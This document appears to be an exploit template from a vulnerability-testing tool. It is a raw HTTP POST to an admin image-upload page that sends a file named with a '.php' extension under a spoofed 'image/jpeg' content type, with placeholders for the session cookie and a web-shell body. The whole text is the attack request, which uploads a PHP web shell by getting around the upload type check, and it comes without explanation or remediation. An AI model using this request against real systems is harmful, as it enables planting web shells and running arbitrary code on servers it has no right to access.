POST /admin.php?action=images HTTP/1.1
Host: 192.168.37.133:8888
Proxy-Connection: keep-alive
Content-Length: 294
Cache-Control: max-age=0
Origin: http://192.168.37.133:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykn0cxRBYFpjA92DI
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.37.133:8888/admin.php?action=images
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: {{cookie}}

------WebKitFormBoundarykn0cxRBYFpjA92DI
Content-Disposition: form-data; name="imagefile"; filename="{{hash}}.php"
Content-Type: image/jpeg


{{shell}}
------WebKitFormBoundarykn0cxRBYFpjA92DI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundarykn0cxRBYFpjA92DI--
